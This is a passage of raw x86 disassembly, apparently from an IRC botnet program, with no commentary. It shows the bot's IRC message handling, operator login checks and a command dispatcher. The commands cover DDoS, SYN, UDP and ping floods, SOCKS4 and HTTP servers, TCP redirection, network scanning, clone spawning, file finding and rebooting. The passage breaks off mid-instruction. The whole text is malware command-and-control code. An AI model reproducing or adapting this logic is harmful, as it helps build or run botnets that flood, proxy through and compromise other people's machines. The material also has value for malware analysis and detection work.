loc_409BEA: ; CODE XREF: sub_409848+3BE�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_409C0C
test cl, cl
jz short loc_409C08
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_409C0C
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_409BEA
loc_409C08: ; CODE XREF: sub_409848+3AC�j
xor eax, eax
jmp short loc_409C11
; ---------------------------------------------------------------------------
loc_409C0C: ; CODE XREF: sub_409848+3A8�j
; sub_409848+3B6�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_409C11: ; CODE XREF: sub_409848+3C2�j
test eax, eax
jnz loc_409AC6
mov eax, [ebp+arg_20]
and dword ptr [eax], 0
jmp loc_409A14
; ---------------------------------------------------------------------------
loc_409C24: ; CODE XREF: sub_409848+2E1�j
mov edi, [ebp+var_A0]
push 5
mov esi, offset aNick ; "NICK"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_409E04
mov eax, [ebp+var_9C]
or [ebp+var_1C], 0FFFFFFFFh
mov ebx, [ebp+arg_18]
inc eax
sub [ebp+var_1C], eax
mov [ebp+arg_0], eax
mov [ebp+var_20], 2
loc_409C57: ; CODE XREF: sub_409848+4A0�j
lea eax, [ebp+var_8F0]
mov esi, ebx
loc_409C5F: ; CODE XREF: sub_409848+433�j
mov dl, [esi]
mov cl, dl
cmp dl, [eax]
jnz short loc_409C81
test cl, cl
jz short loc_409C7D
mov dl, [esi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_409C81
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_409C5F
loc_409C7D: ; CODE XREF: sub_409848+421�j
xor eax, eax
jmp short loc_409C86
; ---------------------------------------------------------------------------
loc_409C81: ; CODE XREF: sub_409848+41D�j
; sub_409848+42B�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_409C86: ; CODE XREF: sub_409848+437�j
test eax, eax
jnz short loc_409CDF
lea eax, [ebp+var_8F0]
push 21h
push eax
call sub_417E80
mov edi, eax
test edi, edi
pop ecx
pop ecx
jz short loc_409CDF
mov eax, [ebp+var_1C]
mov edx, [ebp+arg_0]
lea ecx, [ebx+2]
mov byte ptr [ebx], 3Ah
lea esi, [eax+ecx]
loc_409CAF: ; CODE XREF: sub_409848+46F�j
mov al, [edx]
mov [esi+edx], al
inc edx
test al, al
jnz short loc_409CAF
mov eax, edi
mov esi, edi
loc_409CBD: ; CODE XREF: sub_409848+47A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_409CBD
sub eax, esi
dec ecx
loc_409CC7: ; CODE XREF: sub_409848+485�j
mov dl, [ecx+1]
inc ecx
test dl, dl
jnz short loc_409CC7
mov edi, ecx
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_409CDF: ; CODE XREF: sub_409848+440�j
; sub_409848+456�j
add ebx, 80h
dec [ebp+var_20]
jnz loc_409C57
cmp [ebp+arg_0], 0
jz loc_409AC6
mov esi, [ebp+arg_10]
lea eax, [ebp+var_F0]
loc_409D01: ; CODE XREF: sub_409848+4D5�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_409D23
test cl, cl
jz short loc_409D1F
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_409D23
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_409D01
loc_409D1F: ; CODE XREF: sub_409848+4C3�j
xor eax, eax
jmp short loc_409D28
; ---------------------------------------------------------------------------
loc_409D23: ; CODE XREF: sub_409848+4BF�j
; sub_409848+4CD�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_409D28: ; CODE XREF: sub_409848+4D9�j
test eax, eax
jnz short loc_409D41
push 0Fh
push [ebp+arg_0]
push [ebp+arg_10]
loc_409D34: ; CODE XREF: sub_409848+242�j
call sub_416A00
add esp, 0Ch
jmp loc_409AC6
; ---------------------------------------------------------------------------
loc_409D41: ; CODE XREF: sub_409848+4E2�j
mov edx, [ebp+arg_18]
xor edi, edi
loc_409D46: ; CODE XREF: sub_409848+540�j
cmp byte ptr [edx], 0
jz short loc_409D7E
lea eax, [ebp+var_8F0]
mov esi, edx
loc_409D53: ; CODE XREF: sub_409848+527�j
mov bl, [esi]
mov cl, bl
cmp bl, [eax]
jnz short loc_409D75
test cl, cl
jz short loc_409D71
mov bl, [esi+1]
mov cl, bl
cmp bl, [eax+1]
jnz short loc_409D75
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_409D53
loc_409D71: ; CODE XREF: sub_409848+515�j
xor eax, eax
jmp short loc_409D7A
; ---------------------------------------------------------------------------
loc_409D75: ; CODE XREF: sub_409848+511�j
; sub_409848+51F�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_409D7A: ; CODE XREF: sub_409848+52B�j
test eax, eax
jz short loc_409D8F
loc_409D7E: ; CODE XREF: sub_409848+501�j
inc edi
add edx, 80h
cmp edi, 2
jl short loc_409D46
jmp loc_409AC6
; ---------------------------------------------------------------------------
loc_409D8F: ; CODE XREF: sub_409848+534�j
lea eax, [ebp+var_8F0]
push 21h
push eax
call sub_417E80
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz loc_409AC6
mov ecx, [ebp+arg_0]
lea edx, [ecx+1]
loc_409DAF: ; CODE XREF: sub_409848+56C�j
mov al, [ecx]
inc ecx
test al, al
jnz short loc_409DAF
sub ecx, edx
mov edx, ebx
lea esi, [edx+1]
loc_409DBD: ; CODE XREF: sub_409848+57A�j
mov al, [edx]
inc edx
test al, al
jnz short loc_409DBD
sub edx, esi
add edx, ecx
cmp edx, 7Eh
ja loc_409AC6
push ebx
push [ebp+arg_0]
shl edi, 7
add edi, [ebp+arg_18]
push offset aSS_3 ; ":%s%s"
push edi
call sub_416975
push 0
push 0
lea eax, [ebp+var_354]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_405D62
add esp, 24h
jmp loc_409AC6
; ---------------------------------------------------------------------------
loc_409E04: ; CODE XREF: sub_409848+3EE�j
mov edi, [ebp+var_A0]
mov ebx, offset aPart ; "PART"
push 5
mov esi, ebx
pop ecx
xor eax, eax
repe cmpsb
jz short loc_409E2E
mov edi, [ebp+var_A0]
push 5
mov esi, offset aQuit ; "QUIT"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_409E7E
loc_409E2E: ; CODE XREF: sub_409848+5D0�j
mov esi, [ebp+arg_18]
xor eax, eax
mov [ebp+var_10], esi
loc_409E36: ; CODE XREF: sub_409848+634�j
cmp byte ptr [esi], 0
jz short loc_409E6C
mov edi, [ebp+var_A4]
loc_409E41: ; CODE XREF: sub_409848+615�j
mov dl, [esi]
mov cl, dl
cmp dl, [edi]
jnz short loc_409E63
test cl, cl
jz short loc_409E5F
mov dl, [esi+1]
mov cl, dl
cmp dl, [edi+1]
jnz short loc_409E63
inc esi
inc esi
inc edi
inc edi
test cl, cl
jnz short loc_409E41
loc_409E5F: ; CODE XREF: sub_409848+603�j
xor ecx, ecx
jmp short loc_409E68
; ---------------------------------------------------------------------------
loc_409E63: ; CODE XREF: sub_409848+5FF�j
; sub_409848+60D�j
sbb ecx, ecx
sbb ecx, 0FFFFFFFFh
loc_409E68: ; CODE XREF: sub_409848+619�j
test ecx, ecx
jz short loc_409EC1
loc_409E6C: ; CODE XREF: sub_409848+5F1�j
mov esi, [ebp+var_10]
inc eax
add esi, 80h
cmp eax, 2
mov [ebp+var_10], esi
jl short loc_409E36
loc_409E7E: ; CODE XREF: sub_409848+5E4�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset a353 ; "353"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_409F42
mov esi, [ebp+var_94]
mov eax, [ebp+arg_8]
loc_409E9F: ; CODE XREF: sub_409848+673�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_409F20
test cl, cl
jz short loc_409EBD
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_409F20
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_409E9F
loc_409EBD: ; CODE XREF: sub_409848+661�j
xor eax, eax
jmp short loc_409F25
; ---------------------------------------------------------------------------
loc_409EC1: ; CODE XREF: sub_409848+622�j
mov ecx, [ebp+arg_18]
shl eax, 7
and byte ptr [eax+ecx], 0
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_2F0]
push offset aMainUserSLog_0 ; "[MAIN]: User: %s logged out."
push eax
call sub_416975
lea eax, [ebp+var_2F0]
push eax
call sub_401F0F
mov edi, [ebp+var_A0]
add esp, 10h
push 5
mov esi, ebx
pop ecx
xor eax, eax
repe cmpsb
jnz loc_409AC6
lea eax, [ebp+var_2F0]
push eax
mov eax, [ebp+var_A4]
inc eax
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
jmp loc_409A1F
; ---------------------------------------------------------------------------
loc_409F20: ; CODE XREF: sub_409848+65D�j
; sub_409848+66B�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_409F25: ; CODE XREF: sub_409848+677�j
test eax, eax
jnz short loc_409F32
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_409F32: ; CODE XREF: sub_409848+6DF�j
push [ebp+var_94]
push offset aMainJoinedChan ; "[MAIN]: Joined channel: %s."
jmp loc_40FAF8
; ---------------------------------------------------------------------------
loc_409F42: ; CODE XREF: sub_409848+648�j
mov edi, [ebp+var_A0]
mov eax, offset aPrivmsg ; "PRIVMSG"
push 8
xor edx, edx
mov esi, eax
pop ecx
repe cmpsb
mov edx, offset aNotice ; "NOTICE"
jz short loc_409F92
mov edi, [ebp+var_A0]
push 7
mov esi, edx
pop ecx
xor ebx, ebx
repe cmpsb
jz short loc_409F92
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_42A8E0
pop ecx
xor ebx, ebx
repe cmpsb
jnz loc_40F93F
cmp dword_42FCC8, ebx
jz loc_40F93F
loc_409F92: ; CODE XREF: sub_409848+713�j
; sub_409848+724�j
mov edi, [ebp+var_A0]
mov ebx, [ebp+var_20]
mov esi, eax
push 8
pop ecx
xor eax, eax
repe cmpsb
jz loc_40A097
mov edi, [ebp+var_A0]
push 7
mov esi, edx
pop ecx
xor eax, eax
repe cmpsb
jz loc_40A097
mov eax, [ebp+var_98]
inc [ebp+var_94]
mov [ebp+var_20], 4
mov [ebp+var_9C], eax
loc_409FD8: ; CODE XREF: sub_409848+90D�j
; sub_409848+94C�j ...
mov ebx, [ebp+var_20]
shl ebx, 2
lea eax, [ebp+ebx+var_A4]
mov ecx, [eax]
lea edx, [ecx+1]
mov [eax], edx
mov al, byte_42FCD4
cmp [ecx], al
mov [ebp+var_BC], edx
jnz loc_409AC6
push 6
mov edi, edx
mov esi, offset aLogin ; "login"
pop ecx
xor eax, eax
repe cmpsb
jz loc_40F947
push 2
mov edi, edx
mov esi, offset dword_42A8DC
pop ecx
xor eax, eax
repe cmpsb
jz loc_40F947
cmp [ebp+var_1C], eax
jnz short loc_40A044
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_42A8E0
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40F93F
loc_40A044: ; CODE XREF: sub_409848+7E2�j
xor eax, eax
cmp [ebp+arg_28], eax
jnz loc_40F93F
cmp dword_4301C0, eax
mov [ebp+var_10], eax
jle loc_40A359
mov [ebp+var_1C], offset dword_47FF58
loc_40A065: ; CODE XREF: sub_409848+997�j
mov edi, [ebp+var_1C]
mov esi, edx
loc_40A06A: ; CODE XREF: sub_409848+846�j
mov cl, [edi]
mov al, cl
cmp cl, [esi]
jnz loc_40A1C3
test al, al
jz short loc_40A090
mov cl, [edi+1]
mov al, cl
cmp cl, [esi+1]
jnz loc_40A1C3
inc edi
inc edi
inc esi
inc esi
test al, al
jnz short loc_40A06A
loc_40A090: ; CODE XREF: sub_409848+830�j
xor eax, eax
jmp loc_40A1C8
; ---------------------------------------------------------------------------
loc_40A097: ; CODE XREF: sub_409848+75C�j
; sub_409848+771�j
mov edi, [ebp+var_A0]
push 7
mov esi, edx
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40A0AF
mov [ebp+var_4], 1
loc_40A0AF: ; CODE XREF: sub_409848+85E�j
cmp [ebp+var_9C], 0
jz loc_409AC6
push offset dword_42A8D8
push [ebp+var_9C]
call sub_417440
test eax, eax
pop ecx
pop ecx
jz short loc_40A0D8
cmp [ebp+var_4], 0
jz short loc_40A0E4
loc_40A0D8: ; CODE XREF: sub_409848+888�j
lea eax, [ebp+var_F0]
mov [ebp+var_9C], eax
loc_40A0E4: ; CODE XREF: sub_409848+88E�j
cmp [ebp+var_98], 0
jz loc_409AC6
inc [ebp+var_98]
jz short loc_40A133
cmp [ebp+arg_10], 0
jz short loc_40A133
lea eax, [ebp+var_4BC]
lea edx, [eax+1]
loc_40A108: ; CODE XREF: sub_409848+8C5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40A108
sub eax, edx
push eax
push [ebp+var_98]
lea eax, [ebp+var_4BC]
push eax
call sub_418270
add esp, 0Ch
mov ebx, eax
neg ebx
sbb ebx, ebx
add ebx, 4
mov [ebp+var_20], ebx
loc_40A133: ; CODE XREF: sub_409848+8AF�j
; sub_409848+8B5�j
mov eax, ebx
shl eax, 2
mov edx, [ebp+eax+var_A4]
test edx, edx
jz loc_409AC6
push 0Ah
mov edi, edx
mov esi, offset dword_42A8CC
pop ecx
xor ebx, ebx
repe cmpsb
jnz loc_409FD8
mov esi, [ebp+var_9C]
mov bl, [esi]
cmp bl, 23h
jz short loc_40A186
mov ecx, dword_480AE4
mov ecx, off_42FDC0[ecx*4]
cmp byte ptr [ecx], 0
jz short loc_40A186
push ecx
push esi
push offset dword_42A8B0
jmp loc_409A1F
; ---------------------------------------------------------------------------
loc_40A186: ; CODE XREF: sub_409848+91E�j
; sub_409848+930�j
mov edi, edx
push 6
mov esi, offset dword_42A8A8
pop ecx
xor edx, edx
repe cmpsb
jnz loc_409FD8
mov eax, [ebp+eax+var_A0]
test eax, eax
jz loc_409FD8
cmp bl, 23h
jz loc_409FD8
push eax
push [ebp+var_9C]
push offset dword_42A890
jmp loc_409A1F
; ---------------------------------------------------------------------------
loc_40A1C3: ; CODE XREF: sub_409848+828�j
; sub_409848+83A�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40A1C8: ; CODE XREF: sub_409848+84A�j
test eax, eax
jz short loc_40A1EA
inc [ebp+var_10]
mov eax, [ebp+var_10]
add [ebp+var_1C], 0B8h
cmp eax, dword_4301C0
jl loc_40A065
jmp loc_40A359
; ---------------------------------------------------------------------------
loc_40A1EA: ; CODE XREF: sub_409848+982�j
push offset asc_4285C0 ; " :"
push [ebp+arg_0]
call sub_417440
test eax, eax
pop ecx
pop ecx
jz loc_409AC6
mov esi, [ebp+var_10]
mov cl, byte_42FCD4
imul esi, 0B8h
mov [eax+2], cl
mov cl, byte_42FCD4
mov [eax+3], cl
push 9Fh
lea ecx, dword_47FF70[esi]
push ecx
add eax, 4
push eax
call sub_416A00
lea eax, dword_47FF58[esi]
lea edi, [ebp+ebx+var_64]
add esp, 0Ch
mov [ebp+var_10], 0Fh
mov [ebp+var_1C], eax
mov esi, edi
loc_40A24A: ; CODE XREF: sub_409848+AA6�j
push [ebp+var_10]
lea eax, [ebp+var_C8]
push offset aD_1 ; "$%d-"
push eax
call sub_416975
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_417440
add esp, 14h
test eax, eax
jz short loc_40A2B3
cmp dword ptr [esi], 0
jz short loc_40A2B8
mov eax, [ebp+var_1C]
lea edx, [eax+1]
loc_40A27F: ; CODE XREF: sub_409848+A3C�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40A27F
sub eax, edx
add [ebp+var_14], eax
jz short loc_40A2E4
push dword ptr [esi-4]
push [ebp+var_14]
call sub_417440
test eax, eax
pop ecx
pop ecx
jz short loc_40A2E4
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_4071CF
add esp, 0Ch
jmp short loc_40A2E4
; ---------------------------------------------------------------------------
loc_40A2B3: ; CODE XREF: sub_409848+A2A�j
cmp dword ptr [esi], 0
jnz short loc_40A2E4
loc_40A2B8: ; CODE XREF: sub_409848+A2F�j
push 2
lea eax, [ebp+var_C8]
push eax
lea eax, [ebp+var_24]
push eax
call sub_416A00
and [ebp+var_22], 0
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_4071CF
add esp, 18h
loc_40A2E4: ; CODE XREF: sub_409848+A43�j
; sub_409848+A54�j ...
dec [ebp+var_10]
sub esi, 4
cmp [ebp+var_10], 0
jg loc_40A24A
mov [ebp+var_10], 10h
mov esi, edi
loc_40A2FD: ; CODE XREF: sub_409848+B02�j
push [ebp+var_10]
lea eax, [ebp+var_C8]
push offset aD_0 ; "$%d"
push eax
call sub_416975
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_417440
add esp, 14h
test eax, eax
jz short loc_40A340
mov eax, [esi]
test eax, eax
jz short loc_40A340
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_4071CF
add esp, 0Ch
loc_40A340: ; CODE XREF: sub_409848+ADD�j
; sub_409848+AE3�j
dec [ebp+var_10]
sub esi, 4
cmp [ebp+var_10], 0
jg short loc_40A2FD
mov edx, [ebp+var_BC]
mov [ebp+var_8], 1
loc_40A359: ; CODE XREF: sub_409848+810�j
; sub_409848+99D�j
mov al, byte_42FCD4
cmp [edx], al
jz short loc_40A36C
cmp [ebp+var_8], 0
jz loc_40A548
loc_40A36C: ; CODE XREF: sub_409848+B18�j
push [ebp+arg_10]
mov edi, [ebp+arg_0]
push offset aMe ; "$me"
push edi
call sub_4071CF
lea eax, [ebp+var_F0]
push eax
push offset aUser_2 ; "$user"
push edi
call sub_4071CF
push [ebp+var_9C]
push offset aChan ; "$chan"
push edi
call sub_4071CF
push 0
push 0
lea eax, [ebp+var_C8]
push 2
push eax
call sub_411114
push eax
push offset aRndnick_0 ; "$rndnick"
push edi
call sub_4071CF
add esp, 40h
push [ebp+arg_14]
push offset aServer_1 ; "$server"
push edi
call sub_4071CF
mov esi, offset aChr ; "$chr("
push esi
push edi
call sub_417440
add esp, 14h
jmp loc_40A4CC
; ---------------------------------------------------------------------------
loc_40A3E3: ; CODE XREF: sub_409848+C86�j
push esi
push [ebp+arg_0]
call sub_417440
mov [ebp+var_BC], eax
add eax, 5
push 4
push eax
lea eax, [ebp+var_C8]
push eax
call sub_416A00
lea eax, [ebp+var_C8]
push offset asc_42A850 ; ")"
push eax
call sub_4177E9
add esp, 1Ch
cmp [ebp+var_C8], 30h
jl short loc_40A42A
cmp [ebp+var_C8], 39h
jle short loc_40A440
loc_40A42A: ; CODE XREF: sub_409848+BD7�j
push 3
lea eax, [ebp+var_C8]
push offset a63 ; "63"
push eax
call sub_416A00
add esp, 0Ch
loc_40A440: ; CODE XREF: sub_409848+BE0�j
lea eax, [ebp+var_C8]
push eax
call sub_416D02
test eax, eax
pop ecx
jle short loc_40A463
lea eax, [ebp+var_C8]
push eax
call sub_416D02
pop ecx
mov [ebp+var_24], al
jmp short loc_40A474
; ---------------------------------------------------------------------------
loc_40A463: ; CODE XREF: sub_409848+C07�j
call sub_416B31
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+var_24], dl
loc_40A474: ; CODE XREF: sub_409848+C19�j
and [ebp+var_23], 0
lea eax, [ebp+var_C8]
lea edx, [eax+1]
loc_40A481: ; CODE XREF: sub_409848+C3E�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40A481
sub eax, edx
mov ecx, eax
xor eax, eax
lea edi, [ebp+var_C8]
stosd
stosd
add ecx, 6
push ecx
push [ebp+var_BC]
stosd
lea eax, [ebp+var_C8]
push eax
call sub_416A00
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_4071CF
push esi
push [ebp+arg_0]
call sub_417440
add esp, 20h
loc_40A4CC: ; CODE XREF: sub_409848+B96�j
test eax, eax
jnz loc_40A3E3
mov esi, 1FFh
push esi
push [ebp+arg_0]
lea eax, [ebp+var_2204]
push eax
call sub_416A00
push esi
lea eax, [ebp+var_2204]
push eax
lea eax, [ebp+var_2404]
push eax
call sub_416A00
mov esi, offset asc_422B00 ; " "
lea eax, [ebp+var_2404]
push esi
push eax
call sub_4177E9
xor edi, edi
add esp, 20h
mov [ebp+var_A4], eax
inc edi
loc_40A51B: ; CODE XREF: sub_409848+CE8�j
push esi
push 0
call sub_4177E9
mov [ebp+edi*4+var_A4], eax
inc edi
cmp edi, 20h
pop ecx
pop ecx
jl short loc_40A51B
lea eax, [ebp+ebx+var_A4]
mov ecx, [eax]
test ecx, ecx
jz loc_409AC6
add ecx, 3
mov [eax], ecx
loc_40A548: ; CODE XREF: sub_409848+B1E�j
mov eax, [ebp+ebx+var_A4]
push 8
mov edi, eax
mov esi, offset aRndnick ; "rndnick"
pop ecx
xor edx, edx
repe cmpsb
mov [ebp+var_1C], eax
jz loc_40F8F2
push 3
mov edi, eax
mov esi, offset aRn ; "rn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F8F2
push 4
mov edi, eax
mov esi, offset aDie ; "die"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EE55
push 2
mov edi, eax
mov esi, offset aD ; "d"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EE55
push 7
mov edi, eax
mov esi, offset aLogout ; "logout"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ED67
push 3
mov edi, eax
mov esi, offset aLo ; "lo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ED67
push 8
mov edi, eax
mov esi, offset aVersion ; "version"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ED49
push 4
mov edi, eax
mov esi, offset aVer ; "ver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ED49
push 7
mov edi, eax
mov esi, offset aSecure ; "secure"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EC4A
push 4
mov edi, eax
mov esi, offset aSec ; "sec"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EC4A
push 9
mov edi, eax
mov esi, offset aUnsecure ; "unsecure"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EC4A
push 6
mov edi, eax
mov esi, offset aUnsec ; "unsec"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EC4A
push 7
mov edi, eax
mov esi, offset aSocks4 ; "socks4"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EB25
push 3
mov edi, eax
mov esi, offset aS4 ; "s4"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EB25
push 0Bh
mov edi, eax
mov esi, offset aSocks4stop ; "socks4stop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A692
push [ebp+ebx+var_A0]
push 12h
push offset aServer_0 ; "Server"
push offset aSocks4_0 ; "[SOCKS4]"
jmp loc_40EB09
; ---------------------------------------------------------------------------
loc_40A692: ; CODE XREF: sub_409848+E30�j
push 0Bh
mov edi, eax
mov esi, offset aRloginstop ; "rloginstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A6BA
push [ebp+ebx+var_A0]
push 7
push offset aServer_0 ; "Server"
push offset aRlogind ; "[RLOGIND]"
jmp loc_40EB09
; ---------------------------------------------------------------------------
loc_40A6BA: ; CODE XREF: sub_409848+E58�j
push 9
mov edi, eax
mov esi, offset aHttpstop ; "httpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A6E2
push [ebp+ebx+var_A0]
push 4
push offset aServer_0 ; "Server"
push offset aHttpd ; "[HTTPD]"
jmp loc_40EB09
; ---------------------------------------------------------------------------
loc_40A6E2: ; CODE XREF: sub_409848+E80�j
push 8
mov edi, eax
mov esi, offset aLogstop ; "logstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A70A
push [ebp+ebx+var_A0]
push 1Dh
push offset aLogList ; "Log list"
push offset aLog ; "[LOG]"
jmp loc_40EB09
; ---------------------------------------------------------------------------
loc_40A70A: ; CODE XREF: sub_409848+EA8�j
push 0Dh
mov edi, eax
mov esi, offset aRedirectstop ; "redirectstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A732
push [ebp+ebx+var_A0]
push 11h
push offset aTcpRedirect ; "TCP redirect"
push offset aRedirect_0 ; "[REDIRECT]"
jmp loc_40EB09
; ---------------------------------------------------------------------------
loc_40A732: ; CODE XREF: sub_409848+ED0�j
push 0Ah
mov edi, eax
mov esi, offset aDdos_stop ; "ddos.stop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A75A
push [ebp+ebx+var_A0]
push 0Bh
push offset aDdosFlood ; "DDoS flood"
push offset aDdos ; "[DDoS]"
jmp loc_40EB09
; ---------------------------------------------------------------------------
loc_40A75A: ; CODE XREF: sub_409848+EF8�j
push 8
mov edi, eax
mov esi, offset aSynstop ; "synstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A782
push [ebp+ebx+var_A0]
push 0Ch
push offset aSynFlood ; "Syn flood"
push offset aSyn_0 ; "[SYN]"
jmp loc_40EB09
; ---------------------------------------------------------------------------
loc_40A782: ; CODE XREF: sub_409848+F20�j
push 8
mov edi, eax
mov esi, offset aUdpstop ; "udpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A7AA
push [ebp+ebx+var_A0]
push 10h
push offset aUdpFlood ; "UDP flood"
push offset aUpd ; "[UPD]"
jmp loc_40EB09
; ---------------------------------------------------------------------------
loc_40A7AA: ; CODE XREF: sub_409848+F48�j
push 9
mov edi, eax
mov esi, offset aPingstop ; "pingstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A7D2
push [ebp+ebx+var_A0]
push 0Fh
push offset aPingFlood ; "Ping flood"
push offset aPing_1 ; "[PING]"
jmp loc_40EB09
; ---------------------------------------------------------------------------
loc_40A7D2: ; CODE XREF: sub_409848+F70�j
push 9
mov edi, eax
mov esi, offset aTftpstop ; "tftpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A7FA
push [ebp+ebx+var_A0]
push 5
push offset aServer_0 ; "Server"
push offset aTftp_0 ; "[TFTP]"
jmp loc_40EB09
; ---------------------------------------------------------------------------
loc_40A7FA: ; CODE XREF: sub_409848+F98�j
push 0Dh
mov edi, eax
mov esi, offset aFindfilestop ; "findfilestop"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EAF6
push 7
mov edi, eax
mov esi, offset aFfstop ; "ffstop"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EAF6
push 0Ah
mov edi, eax
mov esi, offset aProcsstop ; "procsstop"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EAE1
push 7
mov edi, eax
mov esi, offset aPsstop ; "psstop"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EAE1
push 0Ah
mov edi, eax
mov esi, offset aClonestop ; "clonestop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A872
push [ebp+ebx+var_A0]
push 18h
push offset aClone ; "Clone"
push offset aClones ; "[CLONES]"
jmp loc_40EB09
; ---------------------------------------------------------------------------
loc_40A872: ; CODE XREF: sub_409848+1010�j
push 0Bh
mov edi, eax
mov esi, offset aSecurestop ; "securestop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A89A
push [ebp+ebx+var_A0]
push 1Ah
push offset aSecure_0 ; "Secure"
push offset aSecure_1 ; "[SECURE]"
jmp loc_40EB09
; ---------------------------------------------------------------------------
loc_40A89A: ; CODE XREF: sub_409848+1038�j
; DATA XREF: .text:0043195C�o ...
push 9
mov edi, eax
mov esi, offset aScanstop ; "scanstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A8C2
push [ebp+ebx+var_A0]
push 9
push offset aScan_1 ; "Scan"
push offset aScan_0 ; "[SCAN]"
jmp loc_40EB09
; ---------------------------------------------------------------------------
loc_40A8C2: ; CODE XREF: sub_409848+1060�j
push 0Ah
mov edi, eax
mov esi, offset aScanstats ; "scanstats"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EAC8
push 6
mov edi, eax
mov esi, offset aStats ; "stats"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EAC8
push 0Ah
mov edi, eax
mov esi, offset aReconnect ; "reconnect"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EAA7
push 2
mov edi, eax
mov esi, offset aR ; "r"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EAA7
push 0Bh
mov edi, eax
mov esi, offset aDisconnect ; "disconnect"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EA85
push 3
mov edi, eax
mov esi, offset aDc ; "dc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EA85
push 5
mov edi, eax
mov esi, offset aQuit_0 ; "quit"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EA3B
push 2
mov edi, eax
mov esi, offset aQ ; "q"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EA3B
push 7
mov edi, eax
mov esi, offset aStatus ; "status"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E9FC
push 2
mov edi, eax
mov esi, offset aS_8 ; "s"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E9FC
push 3
mov edi, eax
mov esi, offset aId ; "id"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E9C4
push 2
mov edi, eax
mov esi, offset aI_0 ; "i"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E9C4
push 7
mov edi, eax
mov esi, offset aReboot ; "reboot"
pop ecx
xor edx, edx
